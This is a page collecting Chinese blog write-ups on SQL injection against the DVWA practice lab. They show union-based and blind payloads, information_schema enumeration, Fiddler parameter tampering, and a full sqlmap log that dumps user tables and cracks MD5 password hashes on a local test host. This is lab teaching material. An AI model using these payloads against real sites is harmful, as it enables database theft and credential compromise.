精华内容
下载资源
问答
  • dvwa的sql注入

    2020-03-27 08:24:58
    SQL i 攻击者在web表单或者页面请求的查询字符串中通过查询的字符串恶意的注入SQl命令,从而使数据库执行恶意的SQl语句 1验证web存在SQL漏洞 2寻找注入点 2.1web页面某个表单的输入框里 2.2web页面的URL查询(带...

    SQL i 攻击者在web表单或者页面请求的查询字符串中通过查询的字符串恶意的注入SQl命令,从而使数据库执行恶意的SQl语句
    在这里插入图片描述
    1验证web存在SQL漏洞
    2寻找注入点
    2.1web页面某个表单的输入框里
    2.2web页面的URL查询(带参数的URl)
    3构造攻击的SQL语句
    4通过注入点提交构造的攻击语句,构造的SQL在数据库执行
    5通过web页面返回数据,提取分析我们想要的数据信息
    注入点类型的判断
    字符型 ‘1’=’1’ 数字型 1=1 探索型 like’%1%’
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    展开全文
  • 记一次DVWA的sql注入

    2021-03-01 12:52:10
    记一次DVWA的sql注入 安全等级:low sql注入 分析:这里有一个输入框,一个submit按钮,输入1,2,3,4,5 各自有不同的输出,1的输出如下 测试注入点: 输入:单个分号 返回: You have an error in your SQL syntax; ...

    记一次DVWA的sql注入

    安全等级:low

    1. sql注入

    在这里插入图片描述

    分析:这里有一个输入框,一个submit按钮,输入1,2,3,4,5 各自有不同的输出,1的输出如下

    在这里插入图片描述

    测试注入点:

    输入:单个分号

    返回: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’’’ at line 1

    这里我们可以发现,这个web站点使用的是MySQL,并且没有对报错进行包装,直接返回了报错信息,

    猜测后台的sql语句是通过拼接出来的,大概是select First_name,Surname from a.b which id = ‘?’;

    问号里面加入输入框里的内容. 所以我们尝试一下union select 来抓一下版本和数据库

    输入:’ union select version(),database();#

    返回:

    在这里插入图片描述

    看到这个我们就可以很明确的看到这里存在sql注入漏洞了,数据库名叫’dvwa’.

    那么我们怎么获取数据呢?

    我们如果想抓到数据,我们就需要去知道数据库的表名和字段名.

    这里有两种方法

    1. 爆破,挨个测试,直到找到数据,这里有个很麻烦的问题,那就是很有可能爆破不出来,比如表名是cms_admin_users 这样我们是很难爆破到的.
    2. 我们可以发现mysql数据库是5.1 这个版本的mysql数据库存在一个information_schema数据库,里面存放了所有数据库表名和字段名.

    我们使用第二种方法来获取数据,

    输入:-1’ union select COLUMN_NAME,TABLE_NAME from information_schema.columns;#

    返回:

    在这里插入图片描述

    这里有太过东西了,我们过滤一下

    输入:-1’ union select COLUMN_NAME,TABLE_NAME from information_schema.columns where TABLE_SCHEMA=‘dvwa’ ;#

    返回:

    在这里插入图片描述

    这就很清晰了,dvwa里面有个users,下面有user,password,first_name,last_name,user_id等等

    我们比较关心的就是user和password

    那么我们试着把帐号密码爆破出来

    输入:-1’ union select user,password from dvwa.users ;#

    输出:

    成功抓去到了密码,

    在这里插入图片描述
    分析样式,我们猜测是md5加密,我们用admin的密码测试下

    md5(‘admin’)=‘21232f297a57a5a743894a0e4a801fc3’

    这里admin的密码也同样是’21232f297a57a5a743894a0e4a801fc3’,我们可以确定,这里的密码是没有加盐的md5,其他密码可以尝试md5爆破解密.

    md5在线解密

    1. sql盲注

    sql盲注分为布尔盲注,报错注入,延时注入.

    布尔盲注:

    在这里插入图片描述
    在这里插入图片描述

    这里通过and来控制布尔结果,当后面的语句是真/假时,会有不同的结果

    我们来尝试去获取数据库的名称

    1.判断长度

    注入语句 结果
    1’ and length(database()) > 20;# false
    1’ and length(database())>10;# false
    1’ and length(database())>5;# false
    1’ and length(database())>3;# true
    1’ and length(database())=4;# true
    1. 查找数据

    我们可以发现,数据库的长度为4
    我们逐个判断数据库的每个字符
    1’ and ascii(substr(database(),1,1))=100;# --true
    这样就可以判断第一个字符为’d’
    同样方法可以去用来查其他数据

    我们也可以尝试用left,right等函数来进行判断.

    延时注入:

    使用if函数进行判断,

    例如

    1’ and if(1=2,1,sleep(5));#

    这里可以通过返回的时间来判断bool值,但是这里的注入成本比较大,获取数据需要比较的时间,容易留下痕迹,并且容易受到网络波动影响,不建议使用这个办法来进行注入

    1. sqlmap自动化注入

    sqlmap是sql注入的神器,可以通过一系列的参数来实现自动化注入,这里我们来使用sqlmap来获取账户密码

    log:

    ✘ ⚡ root@kali  ~  sqlmap -u http://192.168.108.11/dvwa/vulnerabilities/sqli_blind/?id=111&Submit=Submit# --cookie=‘security=low; PHPSESSID=7tv7jou9h4819nurqqbac30nj2’ --tables
    ___
    H
    ___ ["]__ ___ ___ {1.4.9#stable}
    |_ -| . [)] | .’| . |
    || []||_|__,| _|
    ||V… || http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal law
    s. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting @ 12:41:35 /2021-03-01/

    [12:41:35] [INFO] resuming back-end DBMS ‘mysql’
    [12:41:35] **[**INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:

    Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=111’ AND (SELECT 3539 FROM (SELECT(SLEEP(5)))CuYC) AND ‘fobQ’='fobQ&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=111’ UNION ALL SELECT CONCAT(0x716a717a71,0x655859726e4c49754c5657566841525750544d646145514f4c6c6648586777796551654e51485242,0x71787a7a71),NULL-- -&Submit=Submit

    [12:41:35] **[**INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    [12:41:35] [INFO] fetching database names
    [12:41:35] [INFO] fetching tables for databases: ‘dvwa, information_schema’
    [12:41:35] [WARNING] reflective value(s) found and filtering out
    Database: information_schema
    [28 tables]
    ±--------------------------------------+
    | CHARACTER_SETS |
    | COLLATIONS |
    | COLLATION_CHARACTER_SET_APPLICABILITY |
    | COLUMNS |
    | COLUMN_PRIVILEGES |
    | ENGINES |
    | EVENTS |
    | FILES |
    | GLOBAL_STATUS |
    | GLOBAL_VARIABLES |
    | KEY_COLUMN_USAGE |
    | PARTITIONS |
    | PLUGINS |
    | PROCESSLIST |
    | PROFILING |
    | REFERENTIAL_CONSTRAINTS |
    | ROUTINES |
    | SCHEMATA |
    | SCHEMA_PRIVILEGES |
    | SESSION_STATUS |
    | SESSION_VARIABLES |
    | STATISTICS |
    | TABLES |
    | TABLE_CONSTRAINTS |
    | TABLE_PRIVILEGES |
    | TRIGGERS |
    | USER_PRIVILEGES |
    | VIEWS |
    ±--------------------------------------+

    Database: dvwa
    [2 tables]
    ±--------------------------------------+
    | guestbook |
    | users |
    ±--------------------------------------+

    [12:41:35] [INFO] fetched data logged to text files under ‘/root/.local/share/sqlmap/output/192.168.108.11’

    [*] ending @ 12:41:35 /2021-03-01/

    ⚡ root@kali  ~  sqlmap -u http://192.168.108.11/dvwa/vulnerabilities/sqli_blind/?id=111&Submit=Submit# --cookie=‘security=low; PHPSESSID=7tv7jou9h4819nurqqbac30nj2’ -T users --col
    umns
    ___
    H
    ___ [,]__ ___ ___ {1.4.9#stable}
    |_ -| . [] | .’| . |
    || ["]||_|__,| _|
    ||V… || http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal law
    s. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting @ 12:42:03 /2021-03-01/

    [12:42:03] [INFO] resuming back-end DBMS ‘mysql’
    [12:42:03] **[**INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:

    Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=111’ AND (SELECT 3539 FROM (SELECT(SLEEP(5)))CuYC) AND ‘fobQ’='fobQ&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=111’ UNION ALL SELECT CONCAT(0x716a717a71,0x655859726e4c49754c5657566841525750544d646145514f4c6c6648586777796551654e51485242,0x71787a7a71),NULL-- -&Submit=Submit

    [12:42:03] **[**INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    [12:42:03] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
    [12:42:03] [INFO] fetching current database
    [12:42:03] [WARNING] reflective value(s) found and filtering out
    [12:42:03] [INFO] fetching columns for table ‘users’ in database ‘dvwa’
    Database: dvwa
    Table: users
    [6 columns]
    ±-----------±------------+
    | Column | Type |
    ±-----------±------------+
    | user | varchar(15) |
    | avatar | varchar(70) |
    | first_name | varchar(15) |
    | last_name | varchar(15) |
    | password | varchar(32) |
    | user_id | int(6) |
    ±-----------±------------+

    [12:42:03] [INFO] fetched data logged to text files under ‘/root/.local/share/sqlmap/output/192.168.108.11’

    [*] ending @ 12:42:03 /2021-03-01/

    ⚡ root@kali  ~  sqlmap -u http://192.168.108.11/dvwa/vulnerabilities/sqli_blind/?id=111&Submit=Submit# --cookie=‘security=low; PHPSESSID=7tv7jou9h4819nurqqbac30nj2’ -T users --dump
    ___
    H
    ___ []__ ___ ___ {1.4.9#stable}
    |_ -| . [(] | .’| . |
    || []||_|__,| _|
    ||V… || http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal law
    s. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting @ 12:42:18 /2021-03-01/

    [12:42:18] [INFO] resuming back-end DBMS ‘mysql’
    [12:42:18] **[**INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:

    Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=111’ AND (SELECT 3539 FROM (SELECT(SLEEP(5)))CuYC) AND ‘fobQ’='fobQ&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=111’ UNION ALL SELECT CONCAT(0x716a717a71,0x655859726e4c49754c5657566841525750544d646145514f4c6c6648586777796551654e51485242,0x71787a7a71),NULL-- -&Submit=Submit

    [12:42:18] **[**INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    [12:42:18] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
    [12:42:18] [INFO] fetching current database
    [12:42:18] [INFO] fetching columns for table ‘users’ in database ‘dvwa’
    [12:42:18] [INFO] fetching entries for table ‘users’ in database ‘dvwa’
    [12:42:18] [INFO] recognized possible password hashes in column ‘password’
    do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
    [12:42:20] [INFO] writing hashes to a temporary file ‘/tmp/sqlmapzjq_lyv37967/sqlmaphashes-n0l1mwf4.txt’
    do you want to crack them via a dictionary-based attack? [Y/n/q] y
    [12:42:21] [INFO] using hash method ‘md5_generic_passwd’
    [12:42:21] [INFO] resuming password ‘admin’ for hash ‘21232f297a57a5a743894a0e4a801fc3’
    [12:42:21] [INFO] resuming password ‘abc123’ for hash ‘e99a18c428cb38d5f260853678922e03’
    [12:42:21] [INFO] resuming password ‘charley’ for hash ‘8d3533d75ae2c3966d7e0d4fcc69216b’
    [12:42:21] [INFO] resuming password ‘letmein’ for hash ‘0d107d09f5bbe40cade3de5c71e9e9b7’
    [12:42:21] [INFO] resuming password ‘password’ for hash ‘5f4dcc3b5aa765d61d8327deb882cf99’
    [12:42:21] [INFO] resuming password ‘user’ for hash ‘ee11cbb19052e40b07aac0ca060c23ee’
    Database: dvwa
    Table: users
    [6 entries]
    ±--------±--------±-------------------------------------------------±--------------------------------------------±----------±-----------+
    | user_id | user | avatar | password | last_name | first_name |
    ±--------±--------±-------------------------------------------------±--------------------------------------------±----------±-----------+
    | 1 | admin | http://127.0.0.1/dvwa/hackable/users/admin.jpg | 21232f297a57a5a743894a0e4a801fc3 (admin) | admin | admin |
    | 2 | gordonb | http://127.0.0.1/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon |
    | 3 | 1337 | http://127.0.0.1/dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack |
    | 4 | pablo | http://127.0.0.1/dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo |
    | 5 | smithy | http://127.0.0.1/dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob |
    | 6 | user | http://127.0.0.1/dvwa/hackable/users/1337.jpg | ee11cbb19052e40b07aac0ca060c23ee (user) | user | user |
    ±--------±--------±-------------------------------------------------±--------------------------------------------±----------±-----------+

    [12:42:21] [INFO] table ‘dvwa.users’ dumped to CSV file ‘/root/.local/share/sqlmap/output/192.168.108.11/dump/dvwa/users.csv’
    [12:42:21] [INFO] fetched data logged to text files under ‘/root/.local/share/sqlmap/output/192.168.108.11’

    [*] ending @ 12:42:21 /2021-03-01/

    ⚡ root@kali  ~ 

    大概流程就是测试注入点,找到注入点后通过参数查询数据

    sqlmap里面有很多sql注入的脚本以及工具,例如这里,sqlmap判断到密码为md5加密,就可以调用md5爆破工具.

    展开全文
  • 背景:本学期(大四上)的课程《数据库安全》选题为“基于dvwa的sql注入”,当我在进行medium级别的sql注入的时候,需要通过抓包修改参数。在此处主要详述基于dvwa的sql注入的medium级别中使用fiddler修改参数的方法...

    背景:本学期(大四上)的课程《数据库安全》选题为“基于dvwa的sql注入”,当我在进行medium级别的sql注入的时候,需要通过抓包修改参数。在此处主要详述基于dvwa的sql注入的medium级别中使用fiddler修改参数的方法。若要参考基于dvwa的更多操作,可参考:

    http://www.freebuf.com/articles/web/120747.html

    https://zhuanlan.zhihu.com/p/20710250


    下面介绍基于dvwa的sql注入的medium级别中使用fiddler修改参数的方法

    1.搭建并登录dvwa,并把DVWA Security设置为medium,然后选中侧边栏的SQL Injection



    2.在fiddler命令行处输入:bpbefore 127.0.0.1,并按回车。或者单击Rules->Automatic Breakpoints->Before Request。



    3.在SQL Injection下,User ID随便选中一个,比如选中1,并点击Submit提交



    4.此时浏览器会一直等待127.0.0.1,直到fiddler处理请求

    在fiddler中选中刚才的那条Session,查看选项卡inspectors,然后单击webforms,并修改你想修改的参数,比如把id改为1 or 1=1 #



    5.把参数修改完成后,单击Run to completion,单击两次,然后查看浏览器中刚刚访问的页面即可。



    浏览器:



    展开全文
  • SQL注入练习:基于DVWA的SQL注入演练(low) 1、设置 把安全等级先调整为low,让自己获得点信心。 2、测试和分析页面的功能 根据上面的提示,输入用户的id。然后我们输入之后,发现它返回了关于这个user的信息!这里...

    SQL注入练习:基于DVWA的SQL注入演练(low)

    1、设置

    设置等级
    把安全等级先调整为low,让自己获得点信心。

    2、测试和分析页面的功能

    在这里插入图片描述
    根据上面的提示,输入用户的id。然后我们输入之后,发现它返回了关于这个user的信息!这里我们输入了“1”。
    在这里插入图片描述
    它返回三行数据,一行是我们输入的用户ID。一行是用户名,另外一行是用户别名。同时,看一下浏览器的地址栏那里,发现url成这样了
    在这里插入图片描述
    这里有个id=1,是不是就是我们输入的user id呢?再输入“2”,发现url变成了
    在这里插入图片描述
    我们发现这里传进去的id的值是我们可以控制的。我们在输入框中输入什么,就会通过id传进去什么!

    3、对参数进行测试

    对id这个参数进行测试,查看一下它是否存在sql注入漏洞。我们在输入框里面输入“1’”,注意1后面有一个单引号“’”。
    在这里插入图片描述
    发现这里报错了,说我们的sql语句出现了语法错误。
    在这里插入图片描述

    我们可以进行这样一个猜测:首先它这个id是被两个“’”包住的。查询语句可能是这样的:

    select firstname,surname from users where id = ‘1’;

    当我们在1之后加一个引号,则会导致单引号数目不平衡,那么查询语句会变成这样:

    select firstname,surname from users where id = ‘1’’;

    可以看到最后一个引号没被闭合,那我们该怎么办呢?其实有好多种解决的办法,下面就简单介绍下
    **方法一:**可以在原来的基础上再继续输入一个引号,也就是“1’’”。这时我们看一下查询语句:

    select firstname,surname from users where id = ‘1’’’;

    • 在where语句中,当出现多个字符串的时候,“=”将会选择优先级最高的一个,优先级是从左到右,依次降低的,也就是离“=”最近的一个。

    DVWA之SQL注入演练(low)

    看到了么,出来的结果还是和user_id=1一样。

    **方法二:**使用“#”符号来注释后面的单引号,到时查询语句将会变成这样:

    select firstname,surname from users where id = ‘1’#’;

    DVWA之SQL注入演练(low)

    **方法三:**使用“-- ”。这里注意了“-- ”后面有一个空格。在url当中,我们可以使用“+”来代替“–”后面的空格。到时查询语句将会变成这样:

    select firstname,surname from users where id = ‘1’–+’;

    DVWA之SQL注入演练(low)

    上面显示出来的结果和输入1时一样。到这里我们就可以确定:

    漏洞的参数是“id”。
    漏洞的类型是字符型。

    4、构造payload

    在我们确认漏洞之后,就可以构造payload了。什么是payload?简单地说就是一段恶意代码,以便我们能够获得数据库里面的数据。

    4.1 分析字段数

    分析字段数的话,也是有两种方法。

    方法一:用order by 语句。

    分析字段数的原因是我们之后需要用union select语句来获得我们需要的敏感数据。根据order by知识知道,要是后面跟着的数字超出了字段数时,就会报错!通过这个我们可以确定字段数。我们构造的payload如下:

    1’ order by 1#
    在这里插入图片描述
    1’ order by 2#
    在这里插入图片描述

    1’ order by 3#
    在这里插入图片描述

    当输入到3的时候,发现它报错了,也就是说字段数为2。

    方法二:直接用union select来猜测字段数。

    因为当字段数不对应的时候,它也是会发生报错的!我们构造以下查询语句:

    1’ union select 1#
    在这里插入图片描述
    1’ union select 1,2#
    在这里插入图片描述
    1’ union select 1,2,3#
    在这里插入图片描述
    我们发现,当union select 1,2,3的时候报错,union select 1,2的时候没有报错,也就是说字段数为2。同时,我们也注意到,好像返回的内容中多了三条数据,这是啥呢?其实这就是我们union select出来的数据。这样通过查看页面,我们便可以获得数据库里面的信息了!

    4.2 获取信息

    字段数为2,说明数据列有两列。我们可以通过union select语句查出两个数据。现在来获取所需要的数据库里面的信息。

    4.2.1 获取当前数据库名,当前用户名

    构造数据库查询语句如下所示:

    1’ union select database(),user()#

    在这里插入图片描述

    解释一下,database()将会返回当前网站所使用的数据库名字,user()将会返回进行当前查询的用户名。
    在这里插入图片描述
    我们可以看到当前使用的数据库为:dvwa,当前的用户名:root@localhost。

    有时候,后面的select语句会限制输出的行数,一般来说,都会让原数据库查询无效,也就是输入无效的id,使得原数据库查询不反回结果。如下操作:

    -1’ union select database(),user()#

    这样就只会返回我们需要的数据了。

    类似的函数还有:version() 获取当前数据库版本,@@version_compile_os获取当前操作系统。

    -1’ union select version(),@@version_compile_os#
    在这里插入图片描述

    • 数据库版本高于5.0就可以爆库了,下面会具体讲解。

    4.2.2 获取当前的用户表

    根据上面的信息,我们知道当前数据库名为dvwa,可是还不够呀,表名是什么?内容又是什么?是不是打算放弃了?怎么办呢?

    mysql有类似于字典的东西,就是information_schema,这是一个包含了mysql数据库所有信息的“字典”,本质上还是一个database,存放着其他各个数据的信息。

    在information_schema里,有一个表tables。有一个columns……是不是有点感觉了? tables这个表存放的是关于数据库中所有表的信息,里面有个字段叫table_name,还有个字段叫做table_schema。其中table_name是表名,table_schema表示的是这个表所在的数据库。对于columns,它有column_name,table_schema,table_name。回想一下,我们拥有的信息是数据库名。也就是说我们可以构造这样的payload来从数据库里获取一些东西。

    在这里插入图片描述
    在这里插入图片描述
    好的,构造的查询语句如下:

    -1’ union select table_name,2 from information_schema.tables where table_schema= ‘dvwa’#

    爆出来两个表,显然我们会选择users表啦!不是说还有一个columns表么?所以我们还需要table_name以及table_schema来查column_name。这次我们构造的payload如下:

    -1’ union select column_name,2 from information_schema.columns where table_schema= ‘dvwa’ and table_name= ‘users’#
    在这里插入图片描述

    这里简单说一下,倘若不指定数据库名为’dvwa’,若是其他数据里面也存在users表的话,则会出现很多混淆的数据。当然,在这里直接使用下面的语句也是可以成功的。

    -1’ union select column_name,2 from information_schema.columns where table_name=‘users’#
    在这里插入图片描述

    跟上一条结果一样吧?

    又来了,这么多数据,选哪个呢???废话,当然是user,password啦。我们再次修改payload:

    -1’ union select user,password from users#

    在这里插入图片描述

    Binggo!我们爆出所有的用户名和密码值!等等,这密码好像有点奇葩,数一数,32位!好吧,是经过md5加密的。好不容易爆出管理员账号和密码,但是密码却加密,这就没有办法了吗?不一定!我们需要找一些破解md5值的网站来进行破解!直接百度“CMD5”,然后选择一个网站进去破解就可以了。

    我们选择admin这个来进行破解,md5密文为:21232f297a57a5a743894a0e4a801fc3。

    在这里插入图片描述

    可以看到密码已经被破解出来了,密码是“admin”,好的,我们来验证一下!

    在这里插入图片描述
    看,这个时候我们已经成功登陆了!

    好的,简单的SQL注入就说到这儿了,下次我们将进行DVWA里面的中级SQL注入。

    展开全文
  • 基于DVWA的SQL注入学习

    2020-11-29 16:04:17
    SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器...
  • 这里写自定义目录标题首先记一次SQL手工注入流程1、判断是否存在注入注入是字符型还是数字型)2、判断字段长度3、判断回显位置4、获取当前数据库5、获取数据库中表6、获取表中字段7、获取数据DVWA-SQL ...
  • DVWA-SQL注入

    2019-10-03 09:59:43
    SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显...
  • DVWA-sql注入学习

    千次阅读 2019-11-14 10:16:14
    文章目录SQL注入:1,sql注入基础知识2,DVWAsql注入 SQL注入: 1,sql注入基础知识 sql注入基础 一,分类 报错注入,盲注,union注入等。 二,原理 sql注入漏洞需满足以下两个条件: 1,参数用户...
  • DVWAsql注入的操作指南

    千次阅读 2018-09-16 00:28:36
    DVWAsql注入的操作指南 学习渗透测试,一定要掌握各种漏洞检测和利用方法。今天我们分析一下dvwa环境中sql注入从低级到高级渗透步骤。 手动挖掘Sql注入,首先要发现注入点。以low级别为例,发现一个可以输入...
  • dvwa——sql注入

    2021-05-26 19:17:06
    1、登陆DVWA平台,结合所学SQL注入漏洞基本知识,爆出MYSQL版本号、安装路径等信息;最终爆出当前使用数据库名称、数据表名称、字段名称、以及关键字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low...
  • DVWA-SQL注入(SQL Injection)SQL Injection手工注入思路Low漏洞利用判断是否存在注入,注入式字符型还是数字型猜解SQL查询语句中字段数确定显示字段顺序获取当前数据库获取数据库中表获取表中字段 ...
  • dvwaSQL注入&盲注

    千次阅读 2019-06-05 11:33:52
    dvwaSQL注入sql注入手工注入思路low1.判断注入类型2.判断字段数3.确定显示字段顺序4.获取当前数据库5.获取数据库中表名6.获取表中字段名7.下载数据mediumhighsql盲注lowmediumhigh sql注入 手工注入思路 ...
  • DVWA手动SQL注入

    2017-03-29 21:03:20
    DVWA手动SQL注入 首先需要揣测这个sql语句是怎么写,输入一个合法id:1 .观察这里输出信息 这里还需要判断select里有几个位置,所以我们用order by 进行尝试——输入1’ order by 5 –(注意这里–是两个-,...
  • dvwasql注入学习(不同级别)

    万次阅读 多人点赞 2018-03-24 13:33:33
    dvwasql注入学习(不同级别) 级别:Low 从页面上看到,有一个可以提交查询内容地方 我们可以通过以下步骤判断这里是否存在注入点 ① 输入1 提交 ②输入1' 提交 ③输入1 and 1=1提交 ④输入1 ...
  • DVWASQL注入的步骤

    千次阅读 2020-11-23 22:58:14
    SQL注入详解步骤及dvwa靶场演示,本站所有文章均为原创,欢迎转载,请注明文章出处:https://blog.csdn.net/weixin_43847838/article/details/109833310。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般...
  • DVWASQL注入

    2020-10-27 16:50:58
    一、SQL注入原理 二、SQL注入分类 1、按照数据提交方式分类 (1)GET 注入 (2)POST 注入 (3)Cookie 注入 (4)HTTP 头部注入 2、按照注入点分类 (1)数字型注入点 (2)字符型注入点 (3)搜索型注入点 3、按照...
  • owaspbwa-DVWA-SQL注入

    2020-08-09 22:07:42
    DVWA靶场的sql注入有三个难度等级,通过黑盒注入结合代码审计的形式做一下这个靶场
  • 该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
  • dvwa学习sql注入 low级别

    千次阅读 2018-03-11 20:00:34
    刚刚学习web安全,老师第二节课就让用dvwa学习sql注入了,下面是我自己通过书上学习以及在dvwa摸索过程,求大牛们多多指点,勿要喷我级别:Low从页面上看到,有一个可以提交查询内容地方我们可以通过以下步骤...
  • 使用dvwa进行SQL注入的练习

    万次阅读 2019-01-01 22:17:20
    所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力...
  • DVWA-SQL注入(Low-High)

    2020-12-15 16:29:41
    SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显...
  • DVWA(sql注入)

    2020-12-09 00:09:37
    SQL注入是比较常见网络攻击方式之一,它不是利用操作系统BUG来实现攻击,而是针对程序员编写时疏忽,通过SQL语句,实现无账号登录,甚至执行篡改数据库等操作。 Low 输入1,用burp进行抓包; 将报文头复制,...
  • DVWA——sql注入

    2019-08-22 14:48:12
    将恶意的sql语句拼接到合法的语句中,从而达到执行sql语句的目的 类型 字符型、数字型、搜索型 过程 1、判断是否存在注入注入时字符型还是数字型 2、猜解sql查询语句中的字段数(确定select查出了几列,union...
  • DVWA靶机sql注入

    千次阅读 2019-01-16 15:13:57
    1,将dvwa的安全等级改为low 2,查看源代码,发现没有过滤 3,输入1,判断注入类型是数字型还是字符型 发现返回,得知是数字型。 4,1’ 报错得知存在注入点 5,输入1’ order by 1# 6,输入1’ order by 2# 7...
  • DVWA-SQL注入全等级绕过方法

    千次阅读 2021-03-29 02:05:17
    DVWA-SQL注入全等级绕过方法前言一、Low级别union注入判断字段数查表名查字段二、Medium级别二、High级别总结一些初学疑问为什么要加个单引号’,闭合到底是怎么用? 前言   在开始之前,先说一下我对SQL注入的...
  • DVWA-SQL注入攻击

    2020-10-29 19:18:49
    SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合到...
  • DVWA进行SQL注入

    千次阅读 2018-10-02 17:24:11
    我用是在VMware下虚拟机,在这就不说安装kali和win7了,各位自己去网上找...kali:192.168.0.183 进行SQL注入 win7:192.168.0.184 搭建dvwa环境 dvwa使用PHP写,所以首先需要搭建web运行环境,我这里使用...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 915
精华内容 366
关键字:

dvwa的sql注入